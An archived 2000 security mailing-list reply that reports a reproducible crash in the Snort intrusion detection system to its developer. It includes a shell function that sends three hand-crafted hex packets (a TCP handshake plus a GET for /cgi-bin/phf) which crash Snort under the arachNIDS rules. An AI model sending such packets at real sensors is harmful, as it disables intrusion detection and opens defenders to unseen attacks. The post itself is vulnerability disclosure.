|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Fooling NIDS
From: Crist Clark (crist.clark
GLOBALSTAR.COM)Date: Tue Dec 05 2000 - 15:24:09 CST
- Next message: Martin Roesch: "Re: Fooling NIDS"
- Previous message: Ron Gula: "Re: Switched environment NIDS"
- In reply to: Martin Roesch: "Re: Fooling NIDS"
- Next in thread: Martin Roesch: "Re: Fooling NIDS"
- Next in thread: Jon Gary: "Re: Fooling NIDS"
- Reply: Crist Clark: "Re: Fooling NIDS"
- Reply: Martin Roesch: "Re: Fooling NIDS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Martin Roesch wrote:
>
> Really?! Can you provide more information about what was causing the Snort
> crashes?
Umm, well, I sent you an email two weeks ago with full details and another
brief one earlier this week. I never heard anything. I joined the snort-devel
list and was going to bring it up there after I got a feel for the list.
I have not had the chance to dig into exactly what is happening in Snort.
But I did narrow it down to a very reproducible crash. It happened
with Snort 1.6.3 built from the ports in FreeBSD 4-STABLE and on a fully
patched OpenBSD 2.7 system with a vanilla Snort build. I was using Max's
arachNIDS rule set. The crash did not occur with the ruleset distributed
with Snort.
The following attack would send Snort belly up (I think you smart kids
on FOCUS-IDS can figure out what this format means),
get_phf_syn_ack_get () {
$IWU $src $dst $nb $ttl "\
4500 003c 22af 4000 4006 c2d7 0101 0101 \
0202 0202 0662 0050 ed75 49e4 0000 0000 \
a002 7d78 b73e 0000 0204 05b4 0402 080a \
00ec 7f22 0000 0000 0103 0300"
$IWU $src $dst $nb $ttl "\
4500 0034 22b0 4000 4006 c2de 0101 0101 \
0202 0202 0662 0050 ed75 49e5 fce2 41ce \
8010 7d78 9e35 0000 0101 080a 00ec 7f22 \
0b61 fdab"
$IWU $src $dst $nb $ttl "\
4500 004f 22ff 4000 4006 c274 0101 0101 \
0202 0202 0667 0050 54a6 4c48 65f5 9f89 \
8018 7d78 cdaf 0000 0101 080a 00ef 06b0 \
0b64 8537 4745 5420 2f63 6769 2d62 696e \
2f70 6866 2048 5454 502f 312e 300a 0a"
}
At the arachNIDS rule,
alert TCP $EXTERNAL :1024 -> $INTERNAL any (msg:"IDS252/ddos-shaft-synflood-incoming"; seq: 674711609; flags: S;)
At the following point in Snort,
...
int CheckTcpSeqEq(Packet *p, struct _OptTreeNode *otn, OptFpList *fp_list)
{
if (((TcpSeqCheckData *)otn->ds_list[PLUGIN_TCP_ACK_CHECK])->tcp_seq == nto\
hl(p->tcph->th_seq))
{
...
Which is code in sp_tcp_seq_check.c. This specifically was the data
from a seg-fault on OpenBSD.
Since I wanted to make sure it was not a configuration or compilation
error on my part before I did something like post on securityfocus.com
list, I meant to do some more analysis first. But since it came up...
-- Crist J. Clark Network Security Engineer crist.clark
- Next message: Martin Roesch: "Re: Fooling NIDS"
- Previous message: Ron Gula: "Re: Switched environment NIDS"
- In reply to: Martin Roesch: "Re: Fooling NIDS"
- Next in thread: Martin Roesch: "Re: Fooling NIDS"
- Next in thread: Jon Gary: "Re: Fooling NIDS"
- Reply: Crist Clark: "Re: Fooling NIDS"
- Reply: Martin Roesch: "Re: Fooling NIDS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]